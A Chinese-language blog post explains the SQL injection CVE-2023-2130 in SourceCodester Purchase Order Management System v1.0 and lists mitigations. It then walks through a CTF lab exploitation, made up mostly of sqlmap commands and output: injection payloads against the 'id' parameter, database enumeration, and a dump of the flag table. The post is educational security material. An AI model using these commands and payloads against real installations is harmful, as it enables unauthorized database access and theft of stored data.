


CVE-2023-2130是一个影响SourceCodester Purchase Order Management System v1.0的SQL注入漏洞。此漏洞的存在是由于应用程序未能正确过滤和验证用户输入,使得攻击者可以通过SQL注入来执行任意SQL命令,从而对数据库进行未授权的访问和操作。


  1. 获取敏感数据:例如用户凭证、个人信息等。
  2. 修改或删除数据:可以篡改数据库中的记录或删除数据。
  3. 执行管理操作:可能获取管理员权限并执行更高级别的操作。


  1. 使用准备好的语句:通过使用准备好的语句和参数化查询,可以有效地防止SQL注入。
  2. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。
  3. 最小权限原则:数据库用户应仅具有执行其所需操作的最低权限,避免使用高权限账户执行日常操作。
  4. 安全编码实践:采用安全编码实践,如使用ORM(对象关系映射)框架来处理数据库操作,避免手动拼接SQL语句。






定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。




SourceCodester Purchase Order Management System v1.0 是一个基于Web的应用程序,设计用于简化和管理采购订单流程。该系统主要面向中小企业,以提高采购效率,减少手动处理错误,并保持采购记录的透明和可追踪性。


  1. 用户管理

    • 系统允许管理员添加、编辑和删除用户账户,分配不同的权限级别,以确保只有授权用户才能访问和管理采购订单。
  2. 供应商管理

    • 用户可以添加和管理供应商信息,包括供应商名称、联系方式和地址。这有助于在采购订单创建时快速选择和联系供应商。
  3. 采购订单管理

    • 用户可以创建、编辑和查看采购订单。每个订单包括供应商信息、订单日期、交货日期、订单状态和详细的产品列表。
  4. 产品管理

    • 系统允许添加和管理产品信息,包括产品名称、描述、价格和库存数量。用户可以在创建采购订单时选择产品。
  5. 报告和记录

    • 提供详细的采购订单报告和历史记录,方便用户查看过去的订单记录和当前的订单状态。
  6. 通知系统

    • 系统可以发送通知,提醒用户处理新订单或更新订单状态。


  • 前端:使用HTML、CSS和JavaScript构建,提供用户友好的界面。
  • 后端:基于PHP开发,处理业务逻辑和数据库操作。
  • 数据库:使用MySQL存储和管理数据,确保数据的持久性和完整性。


要安装和运行SourceCodester Purchase Order Management System v1.0,用户需要:

  1. Web服务器:如Apache或Nginx。
  2. PHP环境:确保服务器上安装和配置了PHP。
  3. 数据库:设置MySQL数据库并导入提供的数据库脚本。


  • 简化采购流程:通过系统化管理,提高采购流程的效率和准确性。
  • 易于使用:直观的用户界面,使用户能够快速上手。
  • 灵活管理:支持多用户和权限管理,确保系统的安全性和灵活性。

SourceCodester Purchase Order Management System v1.0 是一个实用的工具,适合希望优化采购流程的企业和组织





传送 id 参数试试

使用 SQLMap 爆库

└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" --dbs   
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:44:28 /2024-07-05/

[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db

[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:48:52 /2024-07-05/

[20:48:52] [INFO] resuming back-end DBMS 'mysql' 
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |

[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:10 /2024-07-05/

[20:50:11] [INFO] resuming back-end DBMS 'mysql' 
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
| Column | Type    |
| flag   | text    |
| id     | int(20) |

[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:39 /2024-07-05/

[20:50:40] [INFO] resuming back-end DBMS 'mysql' 
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
| flag                                       |
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |

[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'

[*] ending @ 20:51:00 /2024-07-05/

本文标签: 漏洞sqlSourceCodesterCVE